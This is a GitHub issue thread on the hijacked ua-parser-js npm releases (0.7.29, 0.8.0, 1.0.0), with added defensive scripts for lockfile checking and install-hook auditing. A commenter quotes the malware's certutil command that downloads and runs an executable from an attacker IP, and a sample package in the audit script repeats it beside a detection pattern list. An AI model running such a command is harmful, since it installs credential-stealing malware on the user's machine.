
Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js #536

Open
SuperOleg39 opened this issue Oct 22, 2021 · 184 comments

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

Hi!

See the warning on npm - https://www.npmjs.com/package/ua-parser-js - "This package has been hijacked. Please revert to 0.7.28".

First question - Can we use the range ^0.7.28, or is it not safe?

Second question - Will you create a new package, or try to remove the hijacked versions and continue updating this package?

@nypinstripes nypinstripes commented Oct 22, 2021

Ouch, does that mean there's malicious code in it or something?


@LyesIsogeo LyesIsogeo commented Oct 22, 2021

I just updated the package and Windows Defender blocked "ceprolad.a", a trojan. I didn't have any internet access at that moment...
The trojan tries to execute in cmd: `certutil -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe`. The `certutil -urlcache -f` downloads a .exe file.


@SuperOleg39 SuperOleg39 commented Oct 22, 2021

Update: the ^0.7.28 range is dangerous; version 0.7.29 has already been published.

We all need to pin 0.7.28 in our dependencies.

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

@faisalman, I hope you can revert the versions with vulnerabilities?

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Oct 22, 2021

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

@alex-drocks alex-drocks commented Oct 22, 2021

Revert back to 0.7.28; all greater versions are infected. My computer was infected this morning when I updated my Docusaurus version.
https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

@Tom910 Tom910 commented Oct 22, 2021

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version.


@faisalman faisalman (Owner) commented Oct 22, 2021

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spam from hundreds of websites (maybe so I wouldn't realize something was up; luckily the effect was quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Oct 22, 2021

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

@ohanedan ohanedan commented Oct 22, 2021

I think we should publish new versions above these hijacked versions.

Like:
0.7.30
0.8.1
1.0.1

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

> I think we should publish new versions above these hijacked versions.
>
> Like:
> 0.7.30
> 0.8.1
> 1.0.1

A little problem with that decision: it will be hard to remove these versions in the future.

So ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

@benjilebon benjilebon commented Oct 22, 2021

Extra care is required because it seems to be affecting Linux machines as well; make sure the miner doesn't get installed on your servers and CI stuff.

For now it seems to only hang during install because the URL containing the infection doesn't seem to be working, but that may not last.

Linux users can use this command to see if the miner is running or not and stop it: `ps -aux | grep jsextension`

@ohanedan ohanedan commented Oct 22, 2021

> > I think we should publish new versions above these hijacked versions.
> > Like:
> > 0.7.30
> > 0.8.1
> > 1.0.1
>
> A little problem with that decision: it will be hard to remove these versions in the future.
>
> So ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

That's right, but it's the safest method, I think. You can continue with version 2.0.0, and users who don't specify a specific version will not be affected.


@faisalman faisalman (Owner) commented Oct 22, 2021

> @faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes, I've sent the report using that form; hope they can just be removed. Otherwise, I have to publish under new versions.

@aimozg aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better; it doesn't matter if version numbers suffer a little.

@alex-drocks alex-drocks commented Oct 22, 2021

> This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better; it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.


@faisalman faisalman (Owner) commented Oct 22, 2021

> This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better; it doesn't matter if version numbers suffer a little.

You're right... OK then.

@aimozg aimozg commented Oct 22, 2021

> > This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better; it doesn't matter if version numbers suffer a little.
>
> Does it? I'd have to change all my passwords.

I've uploaded the DLL it runs to VirusTotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior
It reads browser user data files, and I've checked "files written" against my infected PC; it does look like a script to export OS credentials and a copy of the cookies DB file from Chrome.

@gaelhuot gaelhuot commented Oct 22, 2021

We fixed it using this in our package.json:

```json
"resolutions": { "**/ua-parser-js": "0.7.28" }
```


@faisalman faisalman (Owner) commented Oct 22, 2021

> I think we should publish new versions above these hijacked versions.
>
> Like: 0.7.30 0.8.1 1.0.1

Done. Thanks for the suggestion 👍

@Cphusion Cphusion commented Oct 22, 2021

A solution that we're using to address this vulnerability is to set the resolutions in package.json to use the last good version:

```json
{
  ...,
  "resolutions": { "ua-parser-js": "0.7.28" },
  ...
}
```

That resolution will come in handy when using a library that depends on the latest ua-parser-js, as opposed to using ua-parser-js directly in your package.json dependencies.

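The two questions running through the comments above (is `^0.7.28` safe, and how do you force a transitive dependency back to 0.7.28) come down to how npm resolves a caret range and what is actually recorded in the lockfile. The following Node script is an added example, not code from this thread or from the ua-parser-js project: it reimplements caret-range semantics minimally instead of pulling in the `semver` package, walks a package-lock.json `packages` map (lockfile v2/v3 shape) for the three versions the maintainer named as compromised, and emits the `overrides` (npm) / `resolutions` (yarn) snippet that pins the last good release. The sample lockfile is constructed for the example.

```javascript
// Added example; not part of the thread or the ua-parser-js project.
// Versions the maintainer identified as compromised in this thread.
const COMPROMISED = new Set(['0.7.29', '0.8.0', '1.0.0']);

function parse(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  if (!m) throw new Error(`not a plain x.y.z version: ${v}`);
  return m.slice(1).map(Number);
}

function compare(a, b) {
  const [pa, pb] = [parse(a), parse(b)];
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] - pb[i];
  return 0;
}

// Caret semantics: ^x.y.z permits changes that leave the left-most non-zero
// component alone. ^1.0.0 => >=1.0.0 <2.0.0 ; ^0.7.28 => >=0.7.28 <0.8.0.
function caretBounds(base) {
  const [maj, min, pat] = parse(base);
  let upperExclusive;
  if (maj > 0) upperExclusive = `${maj + 1}.0.0`;
  else if (min > 0) upperExclusive = `0.${min + 1}.0`;
  else upperExclusive = `0.0.${pat + 1}`;
  return { lower: base, upperExclusive };
}

// Only caret ranges and exact pins are modelled here (enough for the thread).
function satisfies(version, range) {
  if (range.startsWith('^')) {
    const { lower, upperExclusive } = caretBounds(range.slice(1));
    return compare(version, lower) >= 0 && compare(version, upperExclusive) < 0;
  }
  return compare(version, range) === 0;
}

// npm resolves a range to the highest published version that satisfies it,
// which is why ^0.7.28 picked up 0.7.29 the moment it was published.
function resolve(range, published) {
  const ok = published.filter((v) => satisfies(v, range)).sort(compare);
  return ok.length ? ok[ok.length - 1] : null;
}

// Report every lockfile entry for `name` whose version is compromised.
// Transitive copies live under nested node_modules paths, so match the suffix.
function findCompromised(lock, name = 'ua-parser-js') {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path.endsWith(`node_modules/${name}`) && COMPROMISED.has(entry.version)) {
      hits.push({ path, version: entry.version });
    }
  }
  return hits;
}

// The pin the commenters settled on, in both npm and yarn spelling.
function pinSnippet(name = 'ua-parser-js', version = '0.7.28') {
  return {
    overrides: { [name]: version },          // npm >= 8.3
    resolutions: { [`**/${name}`]: version }, // yarn classic
  };
}

// Constructed sample lockfile: one direct copy on 0.7.28 and one transitive
// copy that floated up to the compromised 0.7.29.
const SAMPLE_LOCK = {
  packages: {
    'node_modules/ua-parser-js': { version: '0.7.28' },
    'node_modules/some-lib/node_modules/ua-parser-js': { version: '0.7.29' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('^0.7.28 before 0.7.30 existed ->', resolve('^0.7.28', ['0.7.28', '0.7.29']));
  console.log('^0.7.28 after 0.7.30 published ->', resolve('^0.7.28', ['0.7.28', '0.7.29', '0.7.30']));
  console.log('compromised entries:', findCompromised(SAMPLE_LOCK));
  console.log(JSON.stringify(pinSnippet(), null, 2));
}
```

The point the script makes concrete: once 0.7.30 existed, a fresh resolve of `^0.7.28` was fine again, but an existing lockfile still recorded whatever was resolved in the window, so checking the lockfile (or `npm ls ua-parser-js`) matters more than the range in package.json.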
@ljharb ljharb commented Oct 27, 2021

There is no yarn registry - it’s just a proxy to the npm registry.

@alex-drocks alex-drocks commented Oct 27, 2021

Everyone publishing to NPM should go to their account and activate 2-factor-authentication protection, as others have already mentioned.

@buennerbernd buennerbernd commented Oct 28, 2021

Maybe I have overlooked this. Could you please repeat the date when the package was compromised?

Thank you.

@DanielRuf DanielRuf commented Oct 28, 2021

@kelset kelset commented Oct 28, 2021

While it's "a solved issue" at this point (as @ljharb points out), @faisalman, I think there are a couple of things that you should do:

  1. Publish a post-mortem.
  2. Edit the title and the first post of this issue to reflect the latest status (which versions were affected, which OSes were affected, a couple of scripts to check if your machine is affected). Then pin the issue.
  3. Once 1 and 2 are done, close this issue.

If you need any help with the above, feel free to reach out, my contacts are in my GH profile page.

@nypinstripes nypinstripes commented Nov 5, 2021

@faisalman, without reading through all 400 comments here, can you tell us whether v1.0.2 is safe to use?

@ccravens ccravens commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening. Please sign and share this petition to show NPM we demand better security procedures on released packages!

https://www.change.org/p/npm-please-secure-package-releasing

@JanithaR JanithaR commented Nov 5, 2021

> Hello all, I've created a petition to get NPM's attention to prevent this from happening. Please sign and share this petition to show NPM we demand better security procedures on released packages!
>
> https://www.change.org/p/npm-please-secure-package-releasing

2-factor authentication is already there. Probably @faisalman didn't have that set up before the incident. I don't see the need for a petition.

@alex-drocks alex-drocks commented Nov 5, 2021

> > Hello all, I've created a petition to get NPM's attention to prevent this from happening. Please sign and share this petition to show NPM we demand better security procedures on released packages!
> > https://www.change.org/p/npm-please-secure-package-releasing
>
> 2-factor authentication is already there. Probably @faisalman didn't have that set up before the incident. I don't see the need for a petition.

Signed

@alex-drocks alex-drocks commented Nov 5, 2021

> Hello all, I've created a petition to get NPM's attention to prevent this from happening. Please sign and share this petition to show NPM we demand better security procedures on released packages!
>
> https://www.change.org/p/npm-please-secure-package-releasing

Yes, it needs to be enforced. I had to rebuild my whole Windows computer from scratch and change major passwords because of this. It was a long week.

@PrivateGER PrivateGER commented Nov 5, 2021

Would you people please stop cluttering this already gigantic thread with garbage like a change.org petition? This is software development, stop creating petitions and raise an issue over at npm instead.

@sharedrory sharedrory commented Nov 5, 2021

> Hello all, I've created a petition to get NPM's attention to prevent this from happening. Please sign and share this petition to show NPM we demand better security procedures on released packages!
>
> https://www.change.org/p/npm-please-secure-package-releasing

Sorry to post this here, but:

> Automatically scan packages for vulnerabilities before being released to the general public

This would only be able to catch whatever is already known.

Part of the real problem is that you can't even see the source code of npm packages without downloading them. If npm gave normal users, and not just teams, access to the files tab, that would be a great step towards a secure future.
Furthermore, displaying not the whole package.json, not the entire scripts section, but even just the scripts that npm runs on the package lifecycle events such as install on the package page would help. This all belongs somewhere where npm will see it, and not here, but I just wanted to say that this is one of the only ways we can solve the problem.

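The audit the comment above asks npm to surface (which lifecycle hooks a package runs at install time) can be done locally against whatever is already in node_modules. The script below is an added example, not code from this thread, from npm, or from the ua-parser-js project: it takes package.json objects, reports every install-time hook, and grades a hook as `high` when it matches download-and-run patterns such as the `certutil` command a commenter quoted earlier in this thread, or `review` otherwise, because a hook like `node setup.js` hides its real behaviour in another file. The pattern list and the sample packages (other than the quoted certutil line) are assumptions constructed for the example.

```javascript
// Added example; not part of the thread, npm, or the ua-parser-js project.
// Audits the lifecycle hooks npm executes at install time. The compromised
// 0.7.29 release used such a hook to download and execute a binary.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumed pattern list: the certutil/jsextension indicators quoted in this
// thread plus common download-and-run helpers. Tune for your environment.
const SUSPICIOUS = [
  /\bcertutil\b/i,
  /jsextension/i,
  /\b(curl|wget)\b/i,
  /\bpowershell\b/i,
  /https?:\/\/\d{1,3}(\.\d{1,3}){3}/i, // raw IP literal in a URL
  /\bchmod\s+\+x\b/i,
];

// Returns one finding per lifecycle hook present in the package.
// severity: 'high' when a pattern matches, otherwise 'review' because the
// hook merely points at another file whose contents still need reading.
function auditPackage(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const matched = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({
      name: pkg.name,
      version: pkg.version,
      hook,
      cmd,
      severity: matched.length > 0 ? 'high' : 'review',
      matched,
    });
  }
  return findings;
}

// Audits many package.json objects, e.g. everything collected from node_modules.
function auditTree(pkgs) {
  return pkgs.flatMap(auditPackage);
}

// Constructed samples. The certutil line is the command a commenter in this
// thread saw Windows Defender block; the package names and versions around
// it are made up for the example.
const SAMPLE_PACKAGES = [
  { name: 'ua-parser-js', version: '0.7.28', scripts: { test: 'jasmine' } },
  {
    name: 'evil-example',
    version: '1.0.0',
    scripts: {
      preinstall:
        'certutil -urlcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe',
    },
  },
  { name: 'opaque-example', version: '2.0.0', scripts: { postinstall: 'node setup.js' } },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditTree(SAMPLE_PACKAGES)) {
    console.log(`[${f.severity}] ${f.name}@${f.version} ${f.hook}: ${f.cmd}`);
  }
}
```

Running `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops these hooks from executing at all, at the cost of breaking packages that legitimately need them; an audit like this tells you which hooks you are opting out of, and which `review` entries deserve a look at the file they invoke.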
@ljharb ljharb commented Nov 5, 2021

@sharedrory yes, you can. https://unpkg.com/ua-parser-js, and npm itself when logged in has an "explore" tab.

@mensfeld mensfeld commented Nov 5, 2021

@sharedrory for code changes you can use the diffend platform mentioned before: https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29

@sharedrory sharedrory commented Nov 5, 2021

> @sharedrory yes, you can. https://unpkg.com/ua-parser-js, and npm itself when logged in has an "explore" tab.

That is not npm. Why should you have to be logged in? Even then it's useless, as most packages are "too big" to be displayed.

> @sharedrory for code changes you can use the diffend platform mentioned before: https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29

That is not npm.

@krishnaUIDev krishnaUIDev commented Nov 18, 2021

@ccravens I think you can make a petition to npm that they have to scan for this kind of malware while publishing to the library.

@gugu gugu commented Nov 18, 2021

@krishnaUIDev do you solve every problem with a petition?

@krishnaUIDev krishnaUIDev commented Nov 18, 2021

> @krishnaUIDev do you solve every problem with a petition?

I think this is the one way.

@ljharb ljharb commented Nov 18, 2021

npm - like almost everything else - doesn’t make decisions by petition.

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Nov 18, 2021

According to GitHub's commitment to npm ecosystem security in the GitHub blog, the NPM team is already working on automated malware detection. NPM will also start requiring two-factor authentication "for maintainers and admins of popular packages" next year.

@PrivateGER PrivateGER commented Nov 19, 2021

> > @krishnaUIDev do you solve every problem with a petition?
>
> I think this is the one way.

No, the one way is the issue tracker over at npm/rfcs. Literally no software project makes decisions by petition. They don't allow discussion, they don't allow modification, they are useless for this case.
